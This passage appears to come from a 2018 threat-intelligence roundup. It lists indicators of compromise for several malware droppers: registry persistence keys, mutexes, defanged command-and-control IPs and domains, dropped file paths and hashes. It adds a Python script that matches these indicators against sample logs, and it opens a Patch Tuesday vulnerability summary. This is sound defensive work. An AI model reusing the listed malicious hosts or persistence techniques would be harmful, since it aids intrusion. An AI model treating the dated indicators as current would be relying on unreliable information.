  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4c8f4917d8ab2943a2b2d4227b0585bf
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: MJOXV418GJ
Mutexes
  • 8-3503835SZBFHHZ
  • 59802CRW6VIZ62Az
IP Addresses
  • 141[.]8[.]225[.]75
  • 43[.]230[.]143[.]219
  • 198[.]46[.]86[.]224
  • 122[.]14[.]210[.]142
  • 52[.]5[.]251[.]20
Domain Names
  • www[.]americasculturalstudies[.]net
  • www[.]danhbaviet[.]com
  • www[.]kegodanang[.]com
  • www[.]www970234[.]com
  • www[.]vhecha[.]com
  • www[.]sevbizleadservices[.]com
Files and or directories created
  • %AppData%\59802CRW\598log.ini
  • %AppData%\59802CRW\598logim.jpeg
  • %AppData%\59802CRW\598logrc.ini
  • %AppData%\59802CRW\598logri.ini
  • %AppData%\59802CRW\598logrv.ini
  • \TEMP\2995593463.exe
File Hashes
  • 00394f8ccd70206920aea6b84cbd14fbfbecd31b9bf7542673793a5c5a35707b
  • 02acbf303617a6661d7f4e994e70508bfd22664452bf27a40af78d7d6e811a1c
  • 046089a17b9742839f5b173f0bf7694e5326e7dcb1a641357cd79827e75f5c51
  • 059e7346e2e8307976cd22f25c51c881d09d11cc59e68e7c7de912ad108c17af
  • 0843abfc1b86ea35e3042507656e81ed7edfff6805702bc418189ac3dd5f6f81
  • 098766c1ee42b13020947978225d9c48e9666c3b326c1f991daf20cde18fb3e0
  • 111b5ab7085c2ab5b75a159eab016668e8c8143b036a8d702be12a69c59be2cd
  • 1157af4bb297bce9c745c387cd66ac19ae4d9f7ee4b5e7a63a6af74defdd389d
  • 12668eb53e18ed75aaac9e82e5ff5ecbf62dfa3034fd4870bbe33b1abe3c89f6
  • 14c8abf43a6cd9337a963f408a8057a880a9c64e383d853829e7f3e4dc354d78
  • 178d41ab9c193b735b37f10e3ef74df84da6cf21fc1bd6c322116d71f6afceb5
  • 1a4054a1714bb64958e6823aa2418a9317d25b24b20f0666199aceb39b5c1c8f
  • 1d4c1dbf89ce24cc7716c9a71a9f8564b93777d715ef484b25fa81bb368c944f
  • 1f4018562d03ff36c05bb9c6691eaee8e4e9ff7965799bd8abc557b86037fe2e
  • 24a76b75a5d387f434a1f4e0f4cfc2aea7176b293ceb9a9511f0aa0c64191e28
  • 29918b68f79c9fb878be4e91dbb81322684b93f0ae9e5743c94de962c7df21ef
  • 2a45c9616dd0518b91c14c6ace489938010886acc7a9dd9a0c3280717fc8d76b
  • 2b4b76c60b34230544419025df8bde3521435d2224e6b0953f5c9417068f6902
  • 2b56221522af3985b09d9ddce4c064a6b157c82698795645a6f5113a177558ff
  • 2c867c08a31b7dd9e4b5c82f16c13431e8a739b983b1e065d40d2768575e7676
  • 2cf0f40a3edc2df3aa1f7be9cdb7100b91b5f9c32575fd6a5e22aad9fc113546
  • 2f62e170384a7960dd937d2242734fd3eddef43ebed31d57d51d69d0eb5ea376
  • 315680ac90ad07c9d05301fe99f23e864b1c38cd1950caf9e7f3ca9447b16b13
  • 328ba025dadc6148fb83dc34d03b519642de0122d41baabd046133efcfe69eca
  • 36b321fd86f75d186e978708789000e45a2a38e436e862c0814524aff5832a8c
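
The roundup publishes its network and file indicators in defanged form (141[.]8[.]225[.]75, www[.]danhbaviet[.]com). As an added example that is not part of the roundup, the following Python script loads indicators in that notation, classifies them by shape, and matches them against key=value log records of the kind a DNS resolver, proxy or endpoint agent would produce. The indicator values are copied from the Win.Dropper.Generickdz-6671833-0 entry above; the log lines, their field names and hosts are constructed for the example.

```python
import re

# Indicator values copied from the Win.Dropper.Generickdz-6671833-0 entry above,
# kept in the roundup's defanged notation.
IOC_TEXT = """
IP Addresses
  • 141[.]8[.]225[.]75
  • 43[.]230[.]143[.]219
Domain Names
  • www[.]americasculturalstudies[.]net
  • www[.]danhbaviet[.]com
File Hashes
  • 00394f8ccd70206920aea6b84cbd14fbfbecd31b9bf7542673793a5c5a35707b
"""

# Constructed log records (hosts, timestamps and field names are made up).
SAMPLE_LOG = r"""
2018-09-05T10:21:03Z dns client=10.0.0.12 query=www.danhbaviet.com type=A
2018-09-05T10:21:04Z proxy client=10.0.0.12 dst=141.8.225.75:80 method=GET
2018-09-05T10:22:10Z dns client=10.0.0.19 query=www.example.com type=A
2018-09-05T10:25:41Z edr host=WS12 sha256=00394f8ccd70206920aea6b84cbd14fbfbecd31b9bf7542673793a5c5a35707b path=C:\TEMP\2995593463.exe
""".strip("\n")

IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$")
KV_RE = re.compile(r"(\w+)=(\S+)")


def refang(value):
    """Undo the roundup's defanging: '[.]' becomes '.', 'hxxp' becomes 'http'."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def load_iocs(text):
    """Classify each indicator by shape; section headers and blank lines are skipped."""
    iocs = {"ips": set(), "domains": set(), "hashes": set()}
    for raw in text.splitlines():
        value = refang(raw.strip().lstrip("•").strip()).lower()
        if not value:
            continue
        if IPV4_RE.match(value):
            iocs["ips"].add(value)
        elif SHA256_RE.match(value):
            iocs["hashes"].add(value)
        elif DOMAIN_RE.match(value):
            iocs["domains"].add(value)
    return iocs


def domain_matches(name, domains):
    """Exact match or a subdomain of a listed domain."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in domains)


def scan_log(log_text, iocs):
    """Return (line_number, field, indicator) for every IOC hit in key=value logs."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for key, value in KV_RE.findall(line):
            if key == "query" and domain_matches(value, iocs["domains"]):
                hits.append((lineno, key, value.lower()))
            elif key == "dst":
                ip = value.rsplit(":", 1)[0]  # drop the port
                if ip in iocs["ips"]:
                    hits.append((lineno, key, ip))
            elif key == "sha256" and value.lower() in iocs["hashes"]:
                hits.append((lineno, key, value.lower()))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, load_iocs(IOC_TEXT)):
        print("line {}: {}={}".format(*hit))
```

Domains are matched as suffixes so that a query for a host under a listed domain is still flagged, hashes are compared case-insensitively, and the destination port is stripped before the IP lookup. Indicators from a roundup are a point-in-time snapshot, so a hit on an IP address in particular deserves confirmation against the date of the sighting before it is acted on.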

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella



Win.Dropper.Kovter-6669952-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SOFTWARE\WOW6432NODE\3E00E5E2D21AC4F4EC6F
    • Value Name: CA640AB774DC8DC9D58
  • <HKLM>\SOFTWARE\WOW6432NODE\EDXF9XO
    • Value Name: MWZPeJZV
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: 8567f942
Mutexes
  • B3E8F6F86CDD9D8B
  • EA4EC370D1E573DA
  • A83BAA13F950654C
IP Addresses
  • 178[.]137[.]207[.]147
  • 68[.]143[.]202[.]61
  • 20[.]143[.]75[.]211
  • 23[.]175[.]186[.]69
  • 130[.]197[.]216[.]217
  • 211[.]129[.]1[.]101
  • 179[.]8[.]135[.]228
  • 27[.]108[.]150[.]40
  • 99[.]223[.]4[.]221
  • 64[.]94[.]71[.]76
  • 89[.]150[.]126[.]91
  • 106[.]243[.]136[.]116
  • 100[.]246[.]196[.]247
Domain Names
  • N/A
Files and or directories created
  • %LocalAppData%\Temp\pygjwa3p.ah2.ps1
  • %LocalAppData%\Temp\tgzjqzza.auy.psm1
  • \TEMP\b9a27f6553f2b34d18b9c1dd49e5877e30a9c9a38147f376b20f2cf9913aabad.exe
File Hashes
  • 02ae96fd92bfc617880a78a74775b470530b8a59e4f262f9f2f203df3d37e2e5
  • 05f9a381f9effeb6f4fc839190fa4c543e0f1bdcf63fafceeb5db42a987e0f85
  • 06215d43b7cddf9072b2f1ff0e8d0706327869253be4517691be138f9aa29268
  • 09ee56b008a1b971d845770057eb2f4e775b3706e412d827a1f3e573d78f1cb1
  • 0a905d26c03a3cbd88f90f97b5e0849b3ec5b9c25c1992ac0871efd93d9772a5
  • 0bf1866ee7b371ea3ffcbe049693010be5f5ab74517256e970383a3449899c52
  • 0c7b21d7d7bde5649d9b0a27e5199b3619daa79541ba74d78ccece91be32fadf
  • 0d078dd1069c996c028a71c2f10e899ba57530462893976221575ae8002ee87f
  • 0dd870a8f9a739f4c0086222ae8c2b1b1d854915a41ddadb7da850a4238be5ea
  • 0ec00e8c4277610ef9eeb5a002211b55989fa86272a020a4f1a79da996ed135f
  • 0edf3f0a681bd1d63e52e37fd0f97c679c91ec081c122542eb3e62e516523ac5
  • 10d2611321e6dd0c1afaa76ffe9c84590e64b99be2411364367728e5075dfdd2
  • 11800040629ce430c329e00da4a3ffc58abb3127f4ea2406d5901a72523c20e8
  • 11dd6cab51f57bb544e6716c280dc69168a2c6ff1581fde2dc2f8c1b1fcc5f3c
  • 12a724b16c05304dcee66991b14c8ca0cc2f3378f5453a1c8dea2bd6211ca95a
  • 1756ea4aa42a81db282be52f2286c746e82a9b87c8c9c10e86f921431e4709df
  • 184cc70b7587abded0ed5631efbdbd86f9fb8f6095339004b589305040dc0bdf
  • 18a7c88bb1278d0cab2e6d5921766bd9896005438a65cb8b5a13546504051d3f
  • 1f8496e44016241a59b753bb73b542f703ad6e7ea098d2e50ec348b773248fe3
  • 1fc7cb727185acd0e714ab24e36639ff5ecc00958ef62ff7287f64e388d777d3
  • 22bada759f4bb6df82936b3572a79f49717dd49d584c48ce89f7b264ba187be5
  • 22c56863b80073a1e6a32c508ff5ab4300af300d773e06732dd6666dfc0d7809
  • 24dc47adb4ead7d8672a4acba6b6aeb80604237ab85ef40aa9cd2e9abcddfe1b
  • 24f462ad25761340aceec33dc166d393e49d8f577ff479d59414f7ecfad49ba1
  • 2782831911a60287dd208a98abc012276b32165c04c86ccd43909471a1d557f9

Coverage


Screenshots of Detection

AMP




ThreatGrid




Win.Dropper.Upatre-6669126-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • N/A
Files and or directories created
  • %LocalAppData%\Temp\vipkewek.exe
File Hashes
  • 00d293d627361d3618fa9e362b2ddac1fcf1a04b05a922955433a4c6954a3be7
  • 034c2de6a80f13e6ad299baaf194d14747f6b29a1b31c0e4f76505430d2dcfe9
  • 04e26fd503240400e6f170f9d58b2a7779d55792353420ba5a69d41d1a336917
  • 0dce7497a6ecd7fdeb0507686a599143b50c94b6026fa5d4a9521b511197a811
  • 105e7235d88d55a70081661f8faa327bc70a40202158b54c8042dc1ff29bd1ab
  • 11c4857c3aea5fc889f39c16a934c975519b1681fcc9fd4c1d8d68fdf6b48ecb
  • 18ba26eae4fd5e66b71d0d2fc666c4a5214bca27fc9af00fc9a59be3ac308618
  • 1e729c31ef2c631cab9b51dc554c4639c86a627faeacf9f6fb73c50b71dea394
  • 26b78a06a970f10e4cf007562c13bbe2d0f0e467681fcf5be0e1770b167dc7b2
  • 273610d574c0af8b0d38eefb115c2b7794dab0c898262997f735755503881291
  • 2fb5f53517290027fbb94b0c0f639aa8cbb974f726f650bda8ea09ee38a9ce54
  • 3199bf691f8a15477f1a5c82e060c80a83bee44d30b6a1874bd7c6e1015e1ec3
  • 4cbdcf8cd9e6b5137e1f0917bea59a4af48387ef07239d47ca68806de7f04f2c
  • a3dfa314702e5e2d7c9242952b33f80ea17e458704d8e6cff49a79f45e1bc7ed
  • ac711b4cc1dd6a307459fe054a1087539e498fd4990867e53c3b8ed85b223e9c
  • b1ec88fd601802d028ec2f6e4501c5a7e934dd1a92ed0934a6d5505ac691fe9d
  • bd0b11fc2ac479598c102436512cff35712af23384a2d7e4ae0b3c329069017d
  • bd1291cb722bcbd10d2c059c672901835d1951d16e35b5091c3b5a44ea081913
  • c19c02baf1bd12e1d8fb4cc31d70b34e8a5f9110ac4423677cd82fdaa019c5fc
  • e6a75ac727881f772f2dd936b8125de06e3c31f3faa86ff285c5540d671faedf

Coverage


Screenshots of Detection

AMP



ThreatGrid




Doc.Dropper.Valyria-6668024-0


Indicators of Compromise


Registry Keys
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
    • Value Name: WpadDecisionTime
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\94-AF-8E-F4-CD-0F
    • Value Name: WpadDecisionReason
  • <HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS
    • Value Name: ld3
Mutexes
  • Global\I98B68E3C
  • Global\M98B68E3C
  • PEM1E4
  • PEM1A0
  • PEM9C8
IP Addresses
  • 69[.]201[.]131[.]220
  • 66[.]115[.]238[.]16
  • 67[.]222[.]19[.]143
  • 213[.]123[.]182[.]53
  • 138[.]128[.]170[.]114
  • 198[.]71[.]233[.]104
  • 128[.]2[.]97[.]187
  • 103[.]215[.]137[.]24
  • 200[.]58[.]111[.]124
  • 8[.]39[.]54[.]102
  • 211[.]100[.]47[.]32
  • 62[.]254[.]26[.]235
  • 151[.]236[.]32[.]35
Domain Names
  • blog[.]bctianfu[.]cn
  • tropicalislandrealtyofflorida[.]com
  • smtp[.]office365[.]com
  • mail[.]vcacademy[.]lk
  • mail[.]lareservasuites[.]com
  • imap[.]1and1[.]co[.]uk
  • mail[.]serviciodecorreo[.]es
  • mail[.]1and1[.]es
  • mail[.]billsmachinesvc[.]com
  • mail[.]royalholidaypalace[.]com
  • mail[.]goodleathergroup[.]com
  • mail[.]tlb[.]sympatico[.]ca
  • smtp[.]gmail[.]com
Files and or directories created
  • \efsrpc
  • %UserProfile%\707.exe
  • %WinDir%\SysWOW64\LDCjSm5OOdIv.exe
  • %LocalAppData%\Temp\zzdz1frv.zq1.psm1
  • %LocalAppData%\Temp\idwlwvc1.j0h.ps1
  • %WinDir%\SysWOW64\nZJz1AtlwhH6.exe
File Hashes
  • 1027dcf0ac13ba9da3a74edd293537bb91a0aa56a6bc35037dd07d0e7c134785
  • 10def6ce3d027c88fdd6d14f8d48cbcf1bea538c6c5d7bba1535b7da8538d625
  • 115e66ae406dc1849e4436bd5123aa11a23140d0e5499df0db4a79bc54d9b0a2
  • 19299ca446bd6e4f35f779b6645e754c447b4b3c3eff47b52ed35dc2f4b9c33a
  • 204fade0f54fcc7004a5c92e267c4b10f2c7e34abe2c23d81148a1da050cd0c4
  • 20b3fd1e9b961bd1ebf99ef2acaf836fd222e7e8e275ee5fe98d147007956476
  • 2411c862c3a10016a8c77ca30260edd0b1578681b2c0e7efb283305d1a06a2d6
  • 24e266c12f9624da9ffb2dfe7ee7ed47aeba644f269389ff65360b2ffdfa665b
  • 26af093d1ec8917ad9e3bdfeb0bb6d0d03d29f936f61e3f3d5f54b3758934cff
  • 2b849aca5039234ac9b5e82e02f1c4f4aef45722f76acb1a340a6077f53f5c30
  • 352db4336e0b680ceede9e99aac261e4181201d1cad868215986cd54f2391efa
  • 36f67278cb1b1667ca13192886f46a2a446a77a87718ba41db95c60493bb33e8
  • 37832082f728da1bacdf336f3781f3fbc2678bb7231369eaffd4bc4c6444c64d
  • 3b738dd4585e5b66bb122670c9e84042111999c9e20e62b0e5e52d475e5b5f5b
  • 4bfb545cbbae97c960f49c26525ac7b138049f1921d007b597c0196a4d9d36ec
  • 4ce483f322ebfbcb4860fa610b9b4b1970423901ae8df689cf5363fa4306a353
  • 4e6b73e7da25b55ddfd245bfba2edd5a184c8b4ad7e5580ba592be66006b0264
  • 4f73d7c59c7f1373e99d93cc4ba0babbe1fcc366269c427753b4a431ad97af8a
  • 584f0539d4110583adacb68d2e38d05164aeeabfec95a0826c3a495dd41059c4
  • 61d340302fafed7644737b27631807d326d68acec8c32462adb5be6668af3a1a
  • 6a85007df58be36c0a7010cd2e153a5949af8e54575a5f3633fbd1e73ec0672c
  • 6d25187f8c2b1d9dbd4ec7daa8239839acd599c263ef5a7d1892be7c755e6209
  • 6d4da277bb48fa1afdeb949e7a806ed3b02dd738c824aa64b4992b5b05ecd23f
  • 7282cdd99960d70cd2baa1526b15aa59a5983c0de21d6b3e65bfd9b140975175
  • 745d9941a7ac2aa275e81dbcbdf4288cc6a04f9e480318ad3c43cad77131473e

Coverage


Screenshots of Detection

AMP






ThreatGrid




Umbrella





Doc.Dropper.Chronos-6667983-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNetbiosOptions
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNameServerList
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpDefaultGateway
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNameServer
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpDefaultGateway
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpSubnetMaskOpt
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\Root
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: DefaultConnectionSettings
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyEnable
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyServer
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyOverride
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoConfigURL
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoDetect
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: SavedLegacySettings
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: ProxyBypass
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: IntranetName
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpInterfaceOptions
Mutexes
  • Global\I98B68E3C
  • Global\M98B68E3C
  • PEM1A4
  • PEM558
  • PEM948
  • PEMBE4
IP Addresses
  • 68[.]203[.]247[.]140
  • 124[.]121[.]192[.]186
  • 176[.]219[.]82[.]79
  • 173[.]236[.]55[.]90
  • 185[.]129[.]3[.]211
  • 24[.]253[.]16[.]214
  • 189[.]253[.]126[.]66
Domain Names
  • withachoice[.]com
Files and or directories created
  • %System32%\config\SYSTEM.LOG1
  • %LocalAppData%\Temp\5jhjztfi.inm.psm1
  • %LocalAppData%\Temp\dgnniruc.yui.ps1
  • %UserProfile%\Documents\20180906\PowerShell_transcript.PC.s2CSwKhg.20180906171831.txt
  • %UserProfile%\157.exe
File Hashes
  • 04bec30f4761ffc717d2dba340c124c37ac85fb926972eb80c0aeb7e34a0b5e5
  • 218ae537669d9dfd02ccf61ca948acef60fdf89104d3e2ef03dcececdb9babbe
  • 54580f2ca416dd89565e0286ddb05c7aed1a5aceeca2766928aa6b90a63f4c34
  • 6969b1dba448683c5b5cfdfe4ccdb9fac72e5e1b67f4534027202571e2b81c15
  • 6bb5037a3a338bea45c96563bd6497a331a9f6efa96bbc5f6536ebc623e7ebb5
  • 79765635b755992b9035560d4e00b550c3690c4a75d4e022b5998f11db4db738
  • 81925e948f9d7d14fe216c3513e9085996d0f9ba1208b0f3e0a2cb69a1843b2f
  • 9c089c555d580ac18b55b2874e92232c5dc86517904ae107ad79cbaf945170d7
  • 9fff7343b067f08e84ff62c3c6c70d514847c19092a07b9d55c6b42025108ff0
  • a0d51ee8ab2770a2587ccc1ad99286463c919a0300010a48b4278594e560f30b
  • a3d5721ae44c6ee97fcffe4d40599fab488d981b6240b8e4514bd744d09990c5
  • bccc98a17302f93b04fddd810bfc194b6382ed6b36fe58c3f8f401e58d36d2be
  • d0bdb2938216c29798bfb752f10c72922b9d8f19f81d838d935f12912ebe23b6

Coverage


Screenshots of Detection

AMP




ThreatGrid



Win.Packed.Generic-6667111-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: internat.exe
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: ProxyBypass
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: IntranetName
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: IntranetName
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: UNCAsIntranet
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: AutoDetect
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyEnable
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyServer
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyOverride
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoConfigURL
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoDetect
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: SavedLegacySettings
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: DefaultConnectionSettings
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: invidiadriver
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • rapidgens[.]info
Files and or directories created
  • %LocalAppData%\Temp\AFUVT.bat
  • %LocalAppData%\Temp\AFUVT.txt
  • %AppData%\system32\intelgfx.exe
  • %LocalAppData%\Temp\LFPKG.exe
File Hashes
  • 01856d473c35bfe514c75fcab72b65a38795ee257cbab923a9fbc6ec6048bea8
  • 01cee3dae8d1578107a5229e51cf491d8ec67891f11b41b11df4bcf4f7dfa033
  • 01ecd0f01d99fa67cde837666df5eb89b81876f3f272b77cd9599950f52dcda1
  • 034ac9f6da8dc800ba756c56db6d412ca56ca80bf8809014eb13311e47ed3d0e
  • 044e60eea0295cc8a7d899f194ec94a642e4dc9f344971a7b4e2b62bcbd52589
  • 0466a2a72c2a9b573e18f9f2d6acd5a319ce3e78c8fad29e751c9fe86b0de6ae
  • 047e9ee436182dd252d40aa1ba48eb4da2f03575080f054303a07c52801dd4f0
  • 06283385bae75ca1771192347384d498df104f57feb89fed273a2c90d45173f1
  • 06f5bbf71529e4ee25f23ccc117e1db3cb49a2ad31df2573882e2cdf2b9c5a0e
  • 097da1809fcd49df77925fdb4f8eba77a5ccc888b7d3856101cdd0a2700f2aca
  • 099b04e2c212aceb3851c2532fc57cb59f12cf574a7ce79d3c609e3bd4145db7
  • 0a75f754c2fb13fa8f006ea3781119fe2e48d8fbe516782f658f9e39431f2466
  • 0c93afa3ca6e94e7a97075e7a187e66b060f0e6b520fb3398b69dbd83d14ed7e
  • 0d4d97ddf1d86e17df6203f777f994f162a55aea1eeb3908df1e29b697324c62
  • 0d615bec997e4e9f02a698cd3faf0985f24aa28ecead3e5ee1a8e2602e2f9a9d
  • 0fb822636382d6c306ee21efa4b1a4f0a8e0d4b5e22b704934cef706fcd24de4
  • 1045a01bc6e0bf8bab6c0b51d5ceb8840485a02b698ab3b691466e0e646863ac
  • 11481494804da9f301b47ec5a4caa3e6479e9cf901b54633d4114c7d7706e254
  • 11cb98ac7c0b4b3dce3831ab511c09f8d8d958ef41396b2ef93121b28ac4aa6f
  • 12b84d0786d49c283d7a3dc3c985af8ff371b133b6b8301cab3c2bf839f2ce42
  • 16c0224bbe0e0bb43002fb7f83f8c6eaba16b0873d3455a570f58cc89fa0d762
  • 1822abcaf9005035798b30c09ff722fe2815f298615c5c59f1fb6cb278301161
  • 19456f5162d26996cfc2adf9b7627e4b7566f6fe600cde3764c71523f2dc795a
  • 1a0a601961f2c46525ebdc772126c0fb4f7802b533033f15a5e6217c5f266aca
  • 1b7d7642e95d7d9152b4d8e8c59d7e1d7000996999c62f45d9a51c50d00f1833

Coverage


Screenshots of Detection

AMP




ThreatGrid



Microsoft Patch Tuesday - September 2018

Microsoft released its monthly set of security updates today, addressing bugs across a range of its products. This Patch Tuesday covers 61 vulnerabilities: 17 rated "critical," 43 rated "important" and one considered "moderate" in severity.

The advisories cover bugs in the Internet Explorer web browser, Jet Database Engine and the Chakra scripting engine, among other products and software.

This update also includes two critical advisories, one of which covers security updates to Adobe Flash, and another that deals with a denial-of-service vulnerability in the Microsoft Windows operating system.

Critical vulnerabilities


Microsoft released coverage for 17 critical bugs. Cisco Talos believes 16 of these are of special importance and need to be addressed by users immediately.

CVE-2018-0965 is a remote code execution vulnerability in the Windows Hyper-V hypervisor. An attacker can exploit this vulnerability by running a specially crafted application on a guest system that would cause the system operating Hyper-V to execute arbitrary code. The flaw lies in the way that Hyper-V validates inputs from an authenticated user on a guest OS.

CVE-2018-8367 is a remote code execution vulnerability in the Chakra scripting engine. The engine improperly handles objects in memory in the Microsoft Edge web browser that could allow an attacker to corrupt the system's memory and execute arbitrary code with the user's credentials.

CVE-2018-8420 is a remote code execution vulnerability in Microsoft XML Core Services MSXML. An attacker could trick the user into visiting a specially crafted, malicious website designed to invoke MSXML through a web browser, allowing the attacker to eventually run code and take control of the user's system.

CVE-2018-8461 is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. This bug could corrupt memory in a way that an attacker could execute arbitrary code with the same rights as the current user. A user would need to visit a specially crafted, malicious website to trigger this vulnerability.

CVE-2018-8475 is a remote code execution vulnerability in Windows OS, which exists due to the image-loading functionality improperly handling malformed image files. An attacker could exploit this bug by convincing a user to load a malformed image file from either a web page, email or other method.

CVE-2018-8332 is a remote code execution vulnerability in the Windows font library. There are multiple ways in which an attacker could exploit this flaw, including convincing the user to click on a malicious web page or providing the user with a specially crafted, malicious document.

